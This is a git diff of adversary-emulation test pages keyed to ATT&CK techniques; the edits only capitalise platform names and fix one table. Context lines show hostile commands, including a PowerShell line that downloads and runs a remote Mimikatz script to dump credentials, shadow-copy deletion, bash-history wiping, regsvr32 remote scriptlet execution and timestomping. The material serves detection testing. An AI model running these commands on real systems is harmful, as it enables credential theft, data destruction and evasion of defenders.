diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md index 3b058a54..68b5e5d6 100644 --- a/atomics/t1002/t1002.md +++ b/atomics/t1002/t1002.md @@ -24,7 +24,7 @@ Requires Network: No ## Atomic Test #1 - Compress Data for Exfiltration With PowerShell TODO -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ## Atomic Test #2 - Compress Data for Exfiltration With Rar TODO -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md index 8fd2b6dd..89257bca 100644 --- a/atomics/t1003/t1003.md +++ b/atomics/t1003/t1003.md @@ -153,7 +153,7 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs ## Atomic Test #1 - Powershell Mimikatz Dumps Credentials via Powershell by invoking a remote mimikatz script -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -171,7 +171,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika ## Atomic Test #2 - Gsecdump https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -184,7 +184,7 @@ gsecdump -a ## Atomic Test #3 - Windows Credential Editor http://www.ampliasecurity.com/research/windows-credentials-editor/ -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -198,7 +198,7 @@ wce -o #{output_file} Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md index 70d568e0..034167ec 100644 --- a/atomics/t1046/t1046.md +++ b/atomics/t1046/t1046.md @@ -22,7 +22,7 @@ Permissions Required: User, Administrator, SYSTEM ## Atomic Test #1 - Scan a bunch of ports to see if they are open xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md index dee692d6..8eb96474 100644 --- a/atomics/t1087/t1087.md +++ b/atomics/t1087/t1087.md @@ -46,7 +46,7 @@ Contributors: Travis Smith, Tripwire ## Atomic Test #1 - List all accounts xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -64,7 +64,7 @@ cat /etc/passwd > #{output_file} ## Atomic Test #2 - View sudoers access xxx (requires root) -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -82,7 +82,7 @@ cat /etc/sudoers > #{output_file} ## Atomic Test #3 - View accounts with UID 0 xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -100,7 +100,7 @@ grep 'x:0:' /etc/passwd > #{output_file} ## Atomic Test #4 - List opened files by user xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -113,7 +113,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ## Atomic Test #5 - Show if a user account has ever logger in remotely xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md index 4fc776a7..d34afe4f 100644 --- a/atomics/t1089/t1089.md +++ b/atomics/t1089/t1089.md @@ -26,7 +26,7 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems ## Atomic Test #1 - Disable iptables firewall Disables the iptables firewall -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -48,7 +48,7 @@ fi ## Atomic Test #2 - Disable syslog Disables syslog collection -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -68,7 +68,7 @@ fi ## Atomic Test #3 - Disable Cb Response Disable the Cb Response service -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -88,7 +88,7 @@ fi ## Atomic Test #4 - Disable SELinux Disables SELinux enforcement -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md index d23c60ab..e314000d 100644 --- a/atomics/t1099/t1099.md +++ b/atomics/t1099/t1099.md @@ -26,7 +26,7 @@ Permissions Required: User, Administrator, SYSTEM ## Atomic Test #1 - Set a file's access timestamp Stomps on the access timestamp of a file -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -44,7 +44,7 @@ touch -a -t 197001010000.00 #{target_filename} ## Atomic Test #2 - Set a file's modification timestamp Stomps on the modification timestamp of a file -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -65,7 +65,7 @@ Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md index 3e2fb99b..00436463 100644 --- a/atomics/t1105/t1105.md +++ b/atomics/t1105/t1105.md @@ -26,7 +26,7 @@ Requires Network: Yes ## Atomic Test #1 - xxxx xxxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `bash`! diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md index 36e51aa4..5bd271bd 100644 --- a/atomics/t1107/t1107.md +++ b/atomics/t1107/t1107.md @@ -50,7 +50,7 @@ Contributors: Walker Johnson ## Atomic Test #1 - Victim configuration Create a temporary directory and several files on the victim system for later deletion -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -66,7 +66,7 @@ echo "This file will be shredded" > /tmp/victim-shred.txt ## Atomic Test #2 - Delete a single file Delete a single file from the temporary directory -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -79,7 +79,7 @@ rm -f /tmp/victim-files/a ## Atomic Test #3 - Delete an entire folder Recursively delete the temporary directory and all files contained within it -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -92,7 +92,7 @@ rm -rf /tmp/victim-files ## Atomic Test #4 - Overwrite and delete a file with shred Use the `shred` command to overwrite the temporary file and then delete it -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -105,7 +105,7 @@ shred -u /tmp/victim-shred.txt ## Atomic Test #5 - Victim configuration Create a temporary directory and several files on the victim system for later deletion -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -135,7 +135,7 @@ type nul > g ## Atomic Test #6 - Delete a single file - cmd Delete a single file from the temporary directory using cmd.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -148,7 +148,7 @@ del /f %TEMP%\victim-files-cmd\a ## Atomic Test #7 - Delete an entire folder - cmd Recursively delete the temporary directory and all files contained within it using cmd.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -161,7 +161,7 @@ del /f /S %TEMP%\victim-files-cmd ## Atomic Test #8 - Delete a single file - ps Delete a single file from the temporary directory using Powershell -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! @@ -174,7 +174,7 @@ Remove-Item -path %TEMP%\victim-files-ps\a ## Atomic Test #9 - Delete an entire folder - ps Recursively delete the temporary directory and all files contained within it using Powershell -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! @@ -187,7 +187,7 @@ Remove-Item -path %TEMP%\victim-files-ps -recurse ## Atomic Test #10 - Delete VSS - vssadmin Delete all volume shadow copies with vssadmin.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -200,7 +200,7 @@ vssadmin.exe Delete Shadows /All /Quiet ## Atomic Test #11 - Delete VSS - wmic Delete all volume shadow copies with wmic -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -213,7 +213,7 @@ wmic shadowcopy delete ## Atomic Test #12 - bcdedit xxx -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -227,7 +227,7 @@ bcdedit /set {default} recoveryenabled no ## Atomic Test #13 - wbadmin xxx -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! diff --git a/atomics/t1110/t1110.md b/atomics/t1110/t1110.md index d34c8aa5..66af0b58 100644 --- a/atomics/t1110/t1110.md +++ b/atomics/t1110/t1110.md @@ -32,7 +32,7 @@ Contributors: John Strand ## Atomic Test #1 - Brute Force Credentials Creates username and password files then attempts to brute force on remote host -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md index ace23e44..eaa98b79 100644 --- a/atomics/t1113/t1113.md +++ b/atomics/t1113/t1113.md @@ -32,7 +32,7 @@ Data Sources: API monitoring, Process monitoring, File monitoring ## Atomic Test #1 - Screencapture Use screencapture command to collect a full desktop screenshot -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Inputs @@ -51,7 +51,7 @@ screencapture ## Atomic Test #2 - Screencapture (silent) Use screencapture command to collect a full desktop screenshot -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Inputs @@ -70,7 +70,7 @@ screencapture -x ## Atomic Test #3 - X Windows Capture Use xwd command to collect a full desktop screenshot and review file with xwud -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs @@ -90,7 +90,7 @@ xwud -in #{output_file} ## Atomic Test #4 - Import Use import command to collect a full desktop screenshot -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md index d77cef2d..23206251 100644 --- a/atomics/t1115/t1115.md +++ b/atomics/t1115/t1115.md @@ -28,7 +28,7 @@ Data Sources: API monitoring ## Atomic Test #1 - Utilize Clipboard to store or execute commands from Add data to clipboard to copy off or execute commands from. -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -42,7 +42,7 @@ clip < readme.txt ## Atomic Test #2 - PowerShell Utilize PowerShell to echo a command to clipboard and execute it -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md index 9413c3c8..562a4455 100644 --- a/atomics/t1117/t1117.md +++ b/atomics/t1117/t1117.md @@ -36,7 +36,7 @@ Contributors: Casey Smith ## Atomic Test #1 - Regsvr32 local COM scriptlet execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -54,7 +54,7 @@ regsvr32.exe /s /u /i:#{filename} scrobj.dll ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -72,7 +72,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll ## Atomic Test #3 - Regsvr32 local DLL execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md index 2de8ec35..fc792f9e 100644 --- a/atomics/t1123/t1123.md +++ b/atomics/t1123/t1123.md @@ -26,7 +26,7 @@ Permissions Required: User ## Atomic Test #1 - SourceRecorder via Windows command prompt Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -45,7 +45,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! diff --git a/atomics/t1127/t1127.md b/atomics/t1127/t1127.md index d3ae3820..47678f69 100644 --- a/atomics/t1127/t1127.md +++ b/atomics/t1127/t1127.md @@ -64,17 +64,16 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward ## Atomic Test #1 - MSBuild Bypass Using Inline Tasks Executes the code in a project file using. C# Example -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | -|-------------------------------------------| - | filename | Location of the project file | Path | T1127.csproj| +|------|-------------|------|---------------| +| filename | Location of the project file | Path | T1127.csproj| #### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj - ```
diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md index 2f7798e1..8b991777 100644 --- a/atomics/t1130/t1130.md +++ b/atomics/t1130/t1130.md @@ -42,7 +42,7 @@ Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt ## Atomic Test #1 - Install root CA on CentOS/RHEL Creates a root CA with openssl -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md index 57959349..34004b92 100644 --- a/atomics/t1136/t1136.md +++ b/atomics/t1136/t1136.md @@ -24,7 +24,7 @@ Permissions Required: Administrator ## Atomic Test #1 - Create a user account on a Linux system Create a user via useradd -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs @@ -43,7 +43,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} ## Atomic Test #2 - Create a user account on a MacOS system Creates a user on a MacOS system with dscl -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Run it with `bash`! diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md index 4bc58acc..5021a4db 100644 --- a/atomics/t1139/t1139.md +++ b/atomics/t1139/t1139.md @@ -20,7 +20,7 @@ Permissions Required: User ## Atomic Test #1 - xxxx xxxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md index 0cd9cb4a..2f85ee1a 100644 --- a/atomics/t1146/t1146.md +++ b/atomics/t1146/t1146.md @@ -32,7 +32,7 @@ Permissions Required: User ## Atomic Test #1 - Clear Bash history (rm) Clears bash history via rm -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -45,7 +45,7 @@ rm ~/.bash_history ## Atomic Test #2 - Clear Bash history (echo) Clears bash history via rm -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -58,7 +58,7 @@ echo "" > ~/.bash_history ## Atomic Test #3 - Clear Bash history (cat dev/null) Clears bash history via cat /dev/null -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -71,7 +71,7 @@ cat /dev/null > ~/.bash_history ## Atomic Test #4 - Clear Bash history (ln dev/null) Clears bash history via a symlink to /dev/null -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -84,7 +84,7 @@ ln -sf /dev/null ~/.bash_history ## Atomic Test #5 - Clear Bash history (truncate) Clears bash history via truncate -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -97,7 +97,7 @@ truncate -s0 ~/.bash_history ## Atomic Test #6 - Clear history of a bunch of shells Clears the history of a bunch of different shell types by setting the history size to zero -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md index ff901f7a..35d5e1e5 100644 --- a/atomics/t1148/t1148.md +++ b/atomics/t1148/t1148.md @@ -22,7 +22,7 @@ Permissions Required: User ## Atomic Test #1 - Disable history collection Disables history collection in shells -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md index a7162d95..bf91fa4e 100644 --- a/atomics/t1158/t1158.md +++ b/atomics/t1158/t1158.md @@ -37,7 +37,7 @@ Permissions Required: User ## Atomic Test #1 - Create a hidden file in a hidden directory Creates a hidden file inside a hidden directory -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md index 545f0f1f..315e4510 100644 --- a/atomics/t1176/t1176.md +++ b/atomics/t1176/t1176.md @@ -30,7 +30,7 @@ Contributors: Justin Warner, ICEBRG ## Atomic Test #1 - Chrome (Developer Mode) xxx -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps! @@ -49,7 +49,7 @@ tick 'Developer Mode'. ## Atomic Test #2 - Chrome (Chrome Web Store) xxx -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps! @@ -65,7 +65,7 @@ in Chrome ## Atomic Test #3 - Firefox Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps!